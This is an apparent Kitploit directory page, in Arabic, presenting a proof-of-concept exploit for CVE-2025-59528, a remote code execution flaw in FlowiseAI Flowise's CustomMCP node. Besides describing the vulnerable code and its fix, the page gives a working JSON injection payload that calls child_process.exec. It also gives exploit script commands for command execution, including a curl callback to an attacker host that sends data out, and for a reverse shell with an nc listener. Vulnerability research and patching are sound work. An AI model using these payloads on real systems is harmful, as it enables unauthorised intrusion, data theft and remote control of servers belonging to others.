Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59528-POC — CVE-2025-59528 - تنفيذ التعليمات البرمجية عن بُعد في FlowiseAI CustomMCP | Kitploit
أدوات/GitHubGitHub/usifaraby/cve-2025-59528-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubusifaraby/cve-2025-59528-poc

CVE-2025-59528-POC

CVE-2025-59528 - تنفيذ التعليمات البرمجية عن بُعد في FlowiseAI CustomMCP

عرض المستودع
11منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-59528 - تنفيذ التعليمات البرمجية عن بعد في FlowiseAI CustomMCP

CVSS 10.0 (حرج) | RCE أعمى | FlowiseAI Flowise >= 2.2.7-patch.1 و < 3.0.6

نظرة عامة

ثغرة حرجة لتنفيذ التعليمات البرمجية عن بعد في عقدة CustomMCP من FlowiseAI Flowise. تمرر الدالة convertToValidJSONString الإدخال المقدم من المستخدم من معامل mcpServerConfig مباشرة إلى منشئ Function() في JavaScript المكافئ وظيفياً لـ eval() مما يسمح بتنفيذ تعليمات برمجية JavaScript عشوائية بامتيازات كاملة لوقت تشغيل Node.js.

  • اكتشفها: Kim SooHyun (@im-soohyun)
  • إشعار: GHSA-3gcm-f6qx-ff7p
  • أُصلح في: Flowise v3.0.6 (استبدل بـ )
Function()
JSON5.parse()

الكود القابل للاستغلال

في packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts، الأسطر 262–270:

root@kitploit:~
function convertToValidJSONString(inputString) {
    return Function('return ' + inputString)();  // ← arbitrary code execution
}

تدفق التلوث:

root@kitploit:~
HTTP POST → /api/v1/node-load-method/customMCP
  → controller.getSingleNodeAsyncOptions()
    → service layer
      → CustomMCP.listActions()
        → convertToValidJSONString(mcpServerConfig)  // Function('return ' + userInput)()

الاستغلال

هذه ثغرة RCE أعمى لا ينعكس مخرجات الأمر في استجابة HTTP. استخدم تقنيات الاستدعاء (curl/wget) أو شل عكسي لتأكيد التنفيذ.

المتطلبات

الشرطالتفاصيل
إصدار Flowise>= 2.2.7-patch.1, < 3.0.6
الوصول للشبكةنقطة نهاية API على المنفذ 3000 (الافتراضي)
المصادقةاختيارية للإصدار < 3.0.1، مطلوبة للإصدار >= 3.0.1

الحمولة

root@kitploit:~
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
  }
}

الاستخدام

root@kitploit:~
pip install requests

التحقق مما إذا كان الهدف ضعيفًا (بناءً على الوقت)

root@kitploit:~
python3 exploit.py -t http://target:3000 --mode check --email [email protected] --password pass

تنفيذ الأوامر الأعمى

root@kitploit:~
# Exfiltrate output via callback
python3 exploit.py -t http://target:3000 --mode exec \
  -c "curl http://ATTACKER:PORT/\$(id | base64)" \
  --email [email protected] --password pass

شل عكسي

root@kitploit:~
# Start listener
nc -lvnp 4444

# Fire exploit (auto-tries bash, nc, python)
python3 exploit.py -t http://target:3000 --mode revshell \
  --lhost ATTACKER_IP --lport 4444 \
  --email [email protected] --password pass

خيارات المصادقة

root@kitploit:~
# JWT auth (Flowise >= 3.0.1)
--email [email protected] --password pass

# Basic auth (Flowise < 3.0.1 with FLOWISE_USERNAME env)
--username admin --password pass

# Raw cookie string (fallback)
--cookie "token=eyJ...;refreshToken=eyJ...;connect.sid=s%3A..."

التصحيح

  • الترقية إلى Flowise >= 3.0.6
  • تقييد الوصول إلى API عبر جدار ناري/VPN
  • تمكين المصادقة على جميع النسخ
  • مراقبة السجلات لطلبات POST إلى /api/v1/node-load-method/customMCP

المراجع

  • NVD — CVE-2025-59528
  • GitHub Advisory — GHSA-3gcm-f6qx-ff7p
  • SonicWall Threat Analysis
  • Fix Commit — Flowise v3.0.6

إخلاء المسؤولية

تم توفير هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على التصريح المناسب قبل الاختبار.

تنزيل الأداة